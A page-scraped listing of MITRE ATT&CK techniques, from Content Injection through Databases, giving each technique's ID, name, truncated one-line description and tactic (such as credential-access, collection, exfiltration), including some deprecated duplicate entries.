|
T1659
|
Content Injection |
Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems throug… |
initial-access |
|
T1218.002
|
Control Panel |
Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (co… |
defense-evasion |
|
T1196
|
Control Panel Items |
Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are… |
defense-evasion |
|
T1136
|
Create Account |
Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With … |
persistence |
|
T1578.002
|
Create Cloud Instance |
An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade de… |
defense-evasion |
|
T1134.002
|
Create Process with Token |
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes… |
defense-evasion |
|
T1578.001
|
Create Snapshot |
An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-tim… |
defense-evasion |
|
T1543
|
Create or Modify System Process |
Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence.… |
persistence |
|
T1056.004
|
Credential API Hooking |
Adversaries may hook into Windows application programming interface (API) functions and Linux system functions to collec… |
collection |
|
T1110.004
|
Credential Stuffing |
Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts throu… |
credential-access |
|
T1589.001
|
Credentials |
Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be… |
reconnaissance |
|
T1552.001
|
Credentials In Files |
Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. The… |
credential-access |
|
T1555
|
Credentials from Password Stores |
Adversaries may search for common password storage locations to obtain user credentials.(Citation: F-Secure The Dukes) P… |
credential-access |
|
T1503
|
Credentials from Web Browsers |
Adversaries may acquire credentials from web browsers by reading files specific to the target browser. (Citation: Talos… |
credential-access |
|
T1555.003
|
Credentials from Web Browsers |
Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos O… |
credential-access |
|
T1081
|
Credentials in Files |
Adversaries may search local file systems and remote file shares for files containing passwords. These can be files crea… |
credential-access |
|
T1214
|
Credentials in Registry |
The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may … |
credential-access |
|
T1552.002
|
Credentials in Registry |
Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry store… |
credential-access |
|
T1053.003
|
Cron |
Adversaries may abuse the <code>cron</code> utility to perform task scheduling for initial or recurring execution of mal… |
execution |
|
T1094
|
Custom Command and Control Protocol |
Adversaries may communicate using a custom command and control protocol instead of encapsulating commands/data in an exi… |
command-and-control |
|
T1024
|
Custom Cryptographic Protocol |
Adversaries may use a custom cryptographic protocol or algorithm to hide command and control traffic. A simple scheme, s… |
command-and-control |
|
T1213.004
|
Customer Relationship Management Software |
Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is u… |
collection |
|
T1003.006
|
DCSync |
Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's a… |
credential-access |
|
T1557.003
|
DHCP Spoofing |
Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHC… |
credential-access |
|
T1574.001
|
DLL |
Adversaries may abuse dynamic-link library files (DLLs) in order to achieve persistence, escalate privileges, and evade … |
persistence |
|
T1038
|
DLL Search Order Hijacking |
Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft DLL Search) A… |
persistence |
|
T1073
|
DLL Side-Loading |
Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be … |
defense-evasion |
|
T1574.002
|
DLL Side-Loading |
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL](https://attack.mitre.org/tec… |
persistence |
|
T1590.002
|
DNS |
Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include… |
reconnaissance |
|
T1071.004
|
DNS |
Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network fil… |
command-and-control |
|
T1568.003
|
DNS Calculation |
Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use … |
command-and-control |
|
T1583.002
|
DNS Server |
Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-comprom… |
resource-development |
|
T1584.002
|
DNS Server |
Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, a… |
resource-development |
|
T1596.001
|
DNS/Passive DNS |
Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may inc… |
reconnaissance |
|
T1002
|
Data Compressed |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it p… |
exfiltration |
|
T1485
|
Data Destruction |
Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to… |
impact |
|
T1132
|
Data Encoding |
Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and con… |
command-and-control |
|
T1022
|
Data Encrypted |
Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or … |
exfiltration |
|
T1486
|
Data Encrypted for Impact |
Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to … |
impact |
|
T1565
|
Data Manipulation |
Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threat… |
impact |
|
T1001
|
Data Obfuscation |
Adversaries may obfuscate command and control traffic to make it more difficult to detect.(Citation: Bitdefender FunnyDr… |
command-and-control |
|
T1074
|
Data Staged |
Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separ… |
collection |
|
T1030
|
Data Transfer Size Limits |
An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresho… |
exfiltration |
|
T1530
|
Data from Cloud Storage |
Adversaries may access data from cloud storage.
Many IaaS providers offer solutions for online data object storage such… |
collection |
|
T1602
|
Data from Configuration Repository |
Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are … |
collection |
|
T1213
|
Data from Information Repositories |
Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that … |
collection |
|
T1005
|
Data from Local System |
Adversaries may search local system sources, such as file systems, configuration files, local databases, virtual machine… |
collection |
|
T1039
|
Data from Network Shared Drive |
Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can b… |
collection |
|
T1025
|
Data from Removable Media |
Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive… |
collection |
|
T1213.006
|
Databases |
Adversaries may leverage databases to mine valuable information. These databases may be hosted on-premises or in the clo… |
collection |
Trusted Design